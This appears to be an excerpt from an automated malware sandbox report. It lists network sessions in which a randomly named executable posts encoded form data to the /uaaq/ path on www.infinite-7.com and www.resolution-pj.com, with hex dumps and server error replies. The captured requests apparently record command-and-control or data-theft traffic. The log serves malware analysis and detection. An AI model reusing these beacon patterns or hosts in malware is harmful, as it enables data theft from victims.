                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.11.304976991.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:39.333466053 CET1635OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 72 4f 6f 4e 6b 33 6c 63 79 54 45 42 74 41 49 79 61 30 54 68 51 41 54 77 57 32 6d 33 35 4d 47 73 77 66 71 31 74 76 67 67 72 6c 51 2b 6b 74 49 62 38 35 4a 6f 52 75 78 35 44 6c 4d 4d 39 68 37 64 46 49 36 35 2f 59 66 56 36 38 75 33 72 68 51 31 66 32 5a 6a 4e 65 62 4f 70 64 2f 62 33 70 39 61 4b 42 39 33 32 4f 50 42 36 34 31 6d 36 49 64 6f 76 35 64 6f 2f 4c 61 6a 4a 49 6f 6c 36 73 56 39 65 73 4b 4d 78 6a 5a 56 61 30 2f 35 5a 66 54 37 30 42 69 69 4e 64 44 6b 62 75 52 32 63 6e 74 31 75 49 48 47 68 42 6b 4b 59 43 62 73 6a 72 2b 62 31 6c 36 63 4e 47 4b 35 71 33 57 2f 59 56 55 4b 49 2f 56 59 48 57 57 46 5a 48 6b 6f 2b 46 4e 66 32 63 63 41 79 37 2f 5a 32 31 77 32 53 32 6f 6e 43 77 76 36 2b 30 4c 62 55 2f 7a 52 68 45 51 74 4f 66 37 47 4c 70 4e 4d 59 62 4d 63 37 6a 61 58 43 70 62 49 4a 6d 34 46 58 7a 62 38 49 36 61 66 53 67 64 44 4c 51 74 75 6c 59 77 53 65 6d 6a 57 36 73 45 65 53 56 58 4e 61 72 5a 63 62 7a 6c 54 7a 41 61 62 6b 78 2b 75 38 35 53 53 59 59 65 78 4a 73 49 43 6d 47 79 2b 58 4e 76 47 61 76 2f 76 57 6b 36 42 4a 6b 51 68 56 49 48 4f 56 53 72 58 66 4e 6a 6e 45 72 34 57 55 73 58 75 48 33 4a 51 75 54 54 6a 55 6c 58 6b 4d 50 62 35 52 5a 43 36 4f 2b 2b 57 36 51 54 54 55 49 61 79 5a 52 48 49 70 6f 38 70 43 61 39 6d 58 73 55 59 55 67 6b 59 7a 69 53 6e 42 4a 38 4a 6e 70 4f 2f 70 35 70 4a 44 76 34 34 35 5a 55 4d 4a 31 50 30 52 43 76 45 5a 35 4e 42 53 2b 65 2b 63 37 4e 55 7a 4d 6f 59 46 53 47 2b 2f 42 4b 58 53 44 52 56 74 71 65 69 78 75 59 49 4b 55 72 4e 58 51 59 4b 67 6d 43 46 74 59 4e 2f 45 75 71 66 4d 62 72 59 5a 66 35 30 59 66 35 4d 68 6c 4d 69 6f 4e 34 42 53 65 54 34 30 6e 47 6d 32 56 72 61 2f 4a 49 4f 35 68 53 58 66 4f 52 53 52 42 54 45 4a 47 67 79 67 73 5a 4a 6f 53 44 66 76 37 77 48 4d 57 57 55 56 2b 33 76 41 51 52 56 4e 41 4b 57 61 65 74 46 71 2b 6c 55 63 64 55 56 67 6f 4f 6f 49 37 52 7a 66 64 75 61 51 72 74 56 56 4a 45 75 62 51 32 47 53 5a 41 64 55 73 39 75 2b 56 74 64 6e 2b 65 48 36 55 54 39 52 72 62 48 68 79 61 53 6f 79 74 77 4e 37 78 58 2b 68 65 50 53 74 58 54 4e 7a 72 4a 41 63 61 55 59 4b 33 61 33 39 6d 47 77 4d 30 39 51 4e 5a 42 6c 39 64 52 6a 79 50 38 48 4f 52 67 38 75 2f 65 4d 43 6e 51 65 59 49 30 68 58 39 39 71 77 6f 50 2b 4a 5a 6b 30 2b 33 47 31 48 57 77 54 71 4c 34 66 64 61 6f 46 4e 36 50 4c 31 48 64 65 72 4b 51 47 7a 74 78 69 74 64 70 58 2f 73 4e 51 52 45 33 75 39 55 53 78 79 7a 33 54 34 52 4d 50 63 32 52 43 6a 6e 76 71 4d 53 49 2f 76 78 34 59 52 4a 2f 38 4e 73 49 77 77 50 6a 6a 66 72 47 39 6c 53 69 49 36 76 61 37 31 38 67 72 57 52 50 73 51 58 35 74 79 59 30 54 30 2f 6b 66 4e 75 52 4d 4f 45 31 4c 67 4c 65 44 6c 78 6c 71 4c 50 6a 50 76 56 78 55 72 42 68 2b 66 41 45 37 52 74 54 31 43 32 49 76 34 37 50 75 6e 7a 6a 61 42 79 41 71 44 34 4d 57 6b 4b 6e 4e 78 44 49 39 31 54 6b 69 72 66 2f 69 73 63 66 39 2b 50 76 72 61 77 46 78 44 44 6f 35 52 76 57 77 61 6d 67 42 43 38 62 48 30 6b 4c 4c 6b 66 7a 51 32 4c 4c 58 74 6a 76 66 62 66 51 69 45 35 70 45 45 6c 37 4a 77 54 50 31 31 4e 67 73 46 51 2f 51 6a 39 50 57 31 6f 6f 77 78 77 4e 46 62 2b 64 6c 4b 53 46 34 44 31 71 7a 74 44 43 56 63 69 68 57 36 45 63 70 33 41 39 55 32 74 78 48 46 50 77 72 61 6f 52 38 68 46 4f 55 65 48 31 63 31 76 74 5a 30 56 31 4b 68 53 72 49 55 54 43 66 31 58 61 47 64 45 75 50 7a 47 74 34 30 6d 49 79 54 2f 47 56 69 47 4d 4a 69 73 78 47 43 4a 55 45 6e 64 6d 5a 31 32 55 75 6b 45 50 61 43 4e 52 69 6c 70 61 5a 45 4c 77 6a 51 7a 52
                                                                                    Data Ascii: 9pG0L=rOoNk3lcyTEBtAIya0ThQATwW2m35MGswfq1tvggrlQ+ktIb85JoRux5DlMM9h7dFI65/YfV68u3rhQ1f2ZjNebOpd/b3p9aKB932OPB641m6Idov5do/LajJIol6sV9esKMxjZVa0/5ZfT70BiiNdDkbuR2cnt1uIHGhBkKYCbsjr+b1l6cNGK5q3W/YVUKI/VYHWWFZHko+FNf2ccAy7/Z21w2S2onCwv6+0LbU/zRhEQtOf7GLpNMYbMc7jaXCpbIJm4FXzb8I6afSgdDLQtulYwSemjW6sEeSVXNarZcbzlTzAabkx+u85SSYYexJsICmGy+XNvGav/vWk6BJkQhVIHOVSrXfNjnEr4WUsXuH3JQuTTjUlXkMPb5RZC6O++W6QTTUIayZRHIpo8pCa9mXsUYUgkYziSnBJ8JnpO/p5pJDv445ZUMJ1P0RCvEZ5NBS+e+c7NUzMoYFSG+/BKXSDRVtqeixuYIKUrNXQYKgmCFtYN/EuqfMbrYZf50Yf5MhlMioN4BSeT40nGm2Vra/JIO5hSXfORSRBTEJGgygsZJoSDfv7wHMWWUV+3vAQRVNAKWaetFq+lUcdUVgoOoI7RzfduaQrtVVJEubQ2GSZAdUs9u+Vtdn+eH6UT9RrbHhyaSoytwN7xX+hePStXTNzrJAcaUYK3a39mGwM09QNZBl9dRjyP8HORg8u/eMCnQeYI0hX99qwoP+JZk0+3G1HWwTqL4fdaoFN6PL1HderKQGztxitdpX/sNQRE3u9USxyz3T4RMPc2RCjnvqMSI/vx4YRJ/8NsIwwPjjfrG9lSiI6va718grWRPsQX5tyY0T0/kfNuRMOE1LgLeDlxlqLPjPvVxUrBh+fAE7RtT1C2Iv47PunzjaByAqD4MWkKnNxDI91Tkirf/iscf9+PvrawFxDDo5RvWwamgBC8bH0kLLkfzQ2LLXtjvfbfQiE5pEEl7JwTP11NgsFQ/Qj9PW1oowxwNFb+dlKSF4D1qztDCVcihW6Ecp3A9U2txHFPwraoR8hFOUeH1c1vtZ0V1KhSrIUTCf1XaGdEuPzGt40mIyT/GViGMJisxGCJUEndmZ12UukEPaCNRilpaZELwjQzR
                                                                                    Dec 4, 2023 12:04:39.516618013 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:04:39 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.11.304977091.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:42.035743952 CET426OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw== HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:42.218748093 CET161INHTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:04:42 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.11.3049771133.130.64.24803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:48.006076097 CET707OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 32 35 50 76 44 6d 78 54 50 41 5a 77 4a 4e 50 53 30 43 43 68 32 36 6a 55 37 4f 72 2f 52 4d 51 69 78 75 53 78 41 63 71 35 73 46 71 6a 38 41 63 4f 74 48 70 4b 46 35 57 6b 39 65 72 61 44 57 33 74 47 43 47 78 38 4b 45 46 57 42 67 48 68 37 33 75 44 32 54 41 70 62 50 70 4e 39 77 44 62 38 78 57 6e 4a 6f 74 69 53 48 79 41 69 36 79 6d 53 5a 71 65 58 48 72 38 7a 78 48 63 37 51 4a 36 42 43 4d 63 43 2b 64 6d 4a 53 47 56 63 6a 65 71 71 6e 69 42 6e 76 62 66 4d 39 6d 36 43 45 34 54 67 48 35 61 7a 49 2f 6e 54 45 42 39 39 41 45 57 35 70 58 73 67 3d 3d
                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwJNPS0CCh26jU7Or/RMQixuSxAcq5sFqj8AcOtHpKF5Wk9eraDW3tGCGx8KEFWBgHh73uD2TApbPpN9wDb8xWnJotiSHyAi6ymSZqeXHr8zxHc7QJ6BCMcC+dmJSGVcjeqqniBnvbfM9m6CE4TgH5azI/nTEB99AEW5pXsg==
                                                                                    Dec 4, 2023 12:04:48.303261042 CET267INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:48 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:04:48.303342104 CET1314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.11.3049772133.130.64.24803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:50.807920933 CET727OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 32 35 50 76 44 6d 78 54 50 41 5a 77 62 35 7a 53 31 6c 65 68 33 61 6a 54 2b 4f 72 2f 62 73 51 6d 78 75 57 78 41 59 61 58 73 33 2b 6a 38 68 73 4f 2f 7a 64 4b 43 35 57 6b 31 2b 72 44 4d 32 33 6d 47 43 62 4f 38 4b 49 46 57 42 45 48 68 36 6e 75 41 48 54 44 7a 72 50 72 42 64 77 42 47 73 78 57 6e 4a 6f 74 69 53 69 56 41 69 79 79 6d 42 42 71 63 32 48 73 31 54 78 45 62 37 51 4a 72 78 43 49 63 43 2f 34 6d 49 50 52 56 5a 2f 65 71 72 58 69 43 32 76 63 51 4d 39 73 6e 79 46 4c 55 6a 2b 42 56 69 6c 6e 33 79 59 50 75 76 59 52 58 73 46 45 72 61 75 72 2b 6a 4b 4d 49 56 59 4e 69 67 4d 4d 71 64 6b 56 2b 36 51 3d
                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwb5zS1leh3ajT+Or/bsQmxuWxAYaXs3+j8hsO/zdKC5Wk1+rDM23mGCbO8KIFWBEHh6nuAHTDzrPrBdwBGsxWnJotiSiVAiyymBBqc2Hs1TxEb7QJrxCIcC/4mIPRVZ/eqrXiC2vcQM9snyFLUj+BViln3yYPuvYRXsFEraur+jKMIVYNigMMqdkV+6Q=
                                                                                    Dec 4, 2023 12:04:51.097749949 CET267INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:50 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:04:51.097937107 CET1314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.11.3049773133.130.64.24803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:53.621731997 CET1644OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 32 35 50 76 44 6d 78 54 50 41 5a 77 62 35 7a 53 31 6c 65 68 33 61 6a 54 2b 4f 72 2f 62 73 51 6d 78 75 57 78 41 59 61 58 73 33 47 6a 38 54 6b 4f 75 6b 42 4b 44 35 57 6b 2f 65 72 47 4d 32 33 37 47 43 43 48 38 4b 30 7a 57 44 4d 48 67 64 6e 75 58 46 37 44 6d 37 50 72 50 4e 77 4d 62 38 78 35 6e 50 49 70 69 53 53 56 41 69 79 79 6d 41 78 71 59 6e 48 73 7a 54 78 48 63 37 51 46 36 42 43 67 63 44 57 46 6d 49 4c 42 56 4b 6e 65 72 4c 48 69 44 41 37 63 5a 4d 39 71 6b 79 46 54 55 69 43 65 56 69 49 57 33 79 74 69 75 6f 38 52 55 59 59 44 79 4f 33 74 38 68 65 6e 4f 46 49 43 71 30 38 32 75 66 55 47 6a 50 6e 32 66 54 43 30 43 67 71 55 52 4e 44 52 4d 67 63 46 46 37 44 78 6a 47 35 2b 70 57 49 6d 55 63 64 79 68 52 7a 67 55 67 77 6f 44 6a 48 79 56 6c 44 71 4a 48 6c 79 77 4a 32 59 64 44 74 59 65 48 7a 6e 37 38 7a 55 55 7a 48 6b 5a 33 30 63 31 32 61 6d 75 2f 73 53 66 53 61 2b 51 35 54 52 6e 41 77 69 34 62 39 32 4b 4b 74 76 35 45 59 4d 45 32 37 70 79 62 30 78 6d 68 61 36 61 72 39 31 72 30 2b 2b 65 36 50 42 61 57 58 63 68 79 73 38 78 56 6c 74 73 6d 59 71 75 5a 76 4d 6c 65 6a 32 46 69 59 69 76 50 78 67 38 4d 78 69 73 4d 41 49 2f 4f 46 50 61 2b 52 5a 7a 52 75 5a 6c 52 6f 6b 37 35 6b 67 46 6c 35 61 56 62 70 7a 62 79 73 6c 48 38 66 39 6d 2b 35 53 2f 75 64 30 45 35 6c 43 4e 51 52 31 56 48 64 6e 54 62 57 44 49 6b 52 34 6e 43 43 34 39 73 58 4e 46 45 77 59 76 33 52 6d 32 32 32 6b 74 52 6e 30 4f 34 2b 36 31 2f 56 63 30 53 33 42 70 74 62 64 34 53 6d 56 65 54 55 4e 68 50 65 55 45 67 77 62 68 6b 4b 35 71 74 46 30 52 36 63 63 78 43 66 61 37 46 64 71 66 50 6a 34 30 54 32 7a 56 56 69 47 36 55 64 70 33 42 76 5a 7a 50 63 63 57 61 33 2f 59 4c 6d 45 4b 37 34 6e 37 2b 47 36 46 63 67 36 45 4c 2f 61 57 38 69 33 58 6e 6a 43 44 4a 63 68 61 47 64 53 50 2b 6c 6b 42 38 6d 2f 6c 34 6b 46 6d 4f 52 72 30 6b 62 58 51 38 48 63 31 79 50 65 51 4d 77 70 61 43 77 4a 67 71 56 79 61 34 70 66 53 42 77 56 68 50 69 6c 7a 75 58 67 4e 41 51 55 32 72 75 6b 78 6e 59 65 46 37 59 69 6e 66 47 56 5a 73 4a 56 62 75 62 72 55 45 2b 47 70 2f 74 41 7a 71 55 55 57 5a 54 73 63 48 59 30 35 75 43 36 37 56 66 73 4e 76 67 55 51 6a 54 70 34 42 33 30 4c 35 2b 51 5a 36 48 48 30 31 74 42 47 78 77 71 6e 48 6e 68 6c 63 71 46 70 65 63 64 6f 6a 6e 7a 6c 51 48 42 6a 61 64 58 65 56 78 33 39 35 38 44 34 43 38 78 69 6d 6e 49 58 48 77 58 37 73 48 48 37 69 2b 4a 72 78 52 72 38 47 73 53 6f 52 42 4a 50 6d 34 2f 54 34 4f 61 7a 58 51 4c 69 4c 66 6b 38 31 44 6f 62 73 73 4e 38 4a 53 6f 64 53 34 6d 35 66 61 69 76 2b 58 78 70 46 57 6a 33 59 41 36 58 4c 37 6e 52 4e 2f 4b 4b 54 33 78 6e 6a 39 70 7a 76 72 45 73 57 4f 48 6f 37 2b 30 30 78 75 48 68 47 6d 6f 66 54 58 30 64 37 70 7a 49 36 78 35 36 49 73 5a 79 45 6f 77 70 4d 36 5a 35 6d 50 50 43 33 71 51 6f 65 75 6e 32 58 77 2b 6b 45 75 45 4b 6d 41 4e 34 2b 41 36 6d 35 51 39 6a 67 53 6d 4f 65 50 52 75 77 76 43 6b 32 2f 69 6d 4f 78 58 76 4b 65 68 38 57 66 51 34 6f 64 32 49 39 55 51 69 42 71 39 4f 6f 62 4e 31 4d 39 2f 73 43 44 36 37 76 4d 39 30 42 77 77 58 43 41 30 64 57 42 54 50 32 53 53 65 79 61 6e 2b 78 45 78 71 56 50 36 6d 52 42 48 42 39 6b 79 7a 4c 6b 56 33 32 67 4f 78 71 66 70 52 72 37 66 34 42 32 66 48 31 37 44 61 61 46 56 39 39 56 62 6d 66 65 36 38 4f 78 32 76 4e 51 59 4e 51 38 51 51 43 70 4b 54 2f 30 61 57 33 52 31 39 73 69 61 37 63 48 4a 5a 4b 79 4a 31 66 31 52 57 49 7a 2f 41 68 78 68 64 76 6a 51 32 2b 74 48 37 36 38 46 39 39 2b 59 77 6c 62 59
